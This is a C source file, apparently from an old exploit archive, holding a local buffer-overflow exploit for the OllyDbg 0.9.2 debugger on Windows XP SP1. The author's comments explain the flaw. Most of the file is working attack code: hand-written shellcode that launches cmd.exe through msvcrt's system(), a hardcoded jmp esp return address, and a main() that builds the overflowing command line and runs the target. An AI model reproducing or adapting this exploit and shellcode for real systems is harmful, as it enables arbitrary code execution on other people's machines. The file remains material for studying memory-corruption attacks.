home *** CD-ROM | disk | FTP | other *** search
- /* Ollydbg 0.9.2 exploit, This can be grabbed from http://sh0dan.org/files/ollyexploit.c
- Very lame, just getting the hang of this win32 stuff
- Ollydbg is vulnerable to a buffer overflow when a valid program is passed
- with a large argv[], this made debugging other local overflows, well trouble some
- so i thought i'd write a little exploit for it, this is what happens when you have
- too much free time... Shellcode is my own, not optimized i need to figure out
- how to push the full msvcrt and cmd.exe string to the stack (i created this shellcode using
- visual c++ __asm( so eh. yeh. This exploit will only work on WinXP SP1 due to hardcoding the
- jmpesp in kernel32.dll and the shellcode addresses are hardcoded for xp sp1.
- take a peek at http://sh0dan.org/files/llacmd.txt for win2ksp3 shellcode.
- Ollydbg can be downloaded from: http://home.t-online.de/home/Ollydbg/ if you're curious.
- -wire
- shouts to my kittens.
- */
- #include <windows.h>
- #include <stdio.h>
- #include <string.h>
- char shellcizode[] =
- "\x55" // push ebp
- "\x8b\xec" // mov ebp, esp
- "\x53" // push ebx
- "\x56" // push esi
- "\x57" // push edi
- "\x8b\xe5" // mov esp, ebp
- "\x55" // push ebp
- "\x8b\xec" // mov ebp, esp
- "\x33\xff" // xor edi,edi
- "\x57" // push edi
- "\x57" // push edi
- "\xc6\x45\xf8\x6d" // mov byte ptr ss:[ebp-8],6d
- "\xc6\x45\xf9\x73" // mov byte ptr ss:[ebp-7],73
- "\xc6\x45\xfa\x76" // mov byte ptr ss:[ebp-6],76
- "\xc6\x45\xfb\x63" // mov byte ptr ss:[ebp-5],63
- "\xc6\x45\xfc\x72" // mov byte ptr ss:[ebp-4],72
- "\xc6\x45\xfd\x74" // mov byte ptr ss:[ebp-3],74
- "\xb8\x61\xd9\xe7\x77" // mov eax,kernel32.loadlibraryA; remember the address is put on inverted...
- "\x50" // push eax
- "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8]
- "\x50" // push eax
- "\xff\x55\xf4" // call dword ptr ss:[ebp-c]
- "\x58" // pop eax
- "\x58" // pop eax
- "\x58" // pop eax
- "\x33\xc0" // xor eax,eax
- "\x50" // push eax
- "\x50" // push eax
- "\xc6\x45\xf8\x63" // mov byte ptr ss:[ebp-8],63
- "\xc6\x45\xf9\x6d" // mov byte ptr ss:[ebp-7],6d
- "\xc6\x45\xfa\x64" // mov byte ptr ss:[ebp-6],64
- "\xc6\x45\xfb\x2e" // mov byte ptr ss:[ebp-5],2e
- "\xc6\x45\xfc\x65" // mov byte ptr ss:[ebp-4],65
- "\xc6\x45\xfd\x78" // mov byte ptr ss:[ebp-3],78
- "\xc6\x45\xfe\x65" // mov byte ptr ss:[ebp-2],65
- "\xb8\x44\x80\xc2\x77" // mov eax, 77c28044; addy of system() from msvcrt in xp sp1
- "\x50" // push eax
- "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8]
- "\x50" // push eax
- "\xff\x55\xf4" // call dword ptr ss:[ebp-c]
- "\x83\xc4\x04" // add esp, 04h
- "\x5c" // pop esp
- "\xc3"; // ret we're done!
-
- int main(int argc, char **argv) {
- char exp_buff[1024];
- int x;
- char ollyfile[100];
- char hehbuf[200];
- DWORD jmpesp = 0x77E9AE59; // from kernel32.dll XP sp1
-
- if (argc != 2) {
- fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
- exit(1);
- }
- strncpy(ollyfile, argv[1], 99);
- ollyfile[100] = 0x00;
-
- x = strlen(ollyfile) * 2; // each character changes where the return is by 2 characters due to it being passed once to
- // call the program and the other for calling itself C:\olly\ollydbg.exe C:\olly\ollydbg.exe ..
- memset(exp_buff, 0x90, 1024); //set our buff to nops...
-
- sprintf(hehbuf, "%s %s ", ollyfile, ollyfile); // C:\ollydbg.exe C:\ollydbg...
-
- memcpy(exp_buff, hehbuf, strlen(hehbuf));
-
- memcpy(exp_buff+511+x, &jmpesp, 4); // C:\ollydbg.exe C:\ollydbg.exe NOPx511+x
-
- memcpy(exp_buff+518+x, &shellcizode, 105); // And our shellcode.
- exp_buff[700] = 0x00; // null it so we're passing a valid string.
- //fprintf(stderr, "%s", exp_buff); //debugging heh
-
- WinExec(exp_buff, SW_SHOW); //execute....
- return(0);
- }
-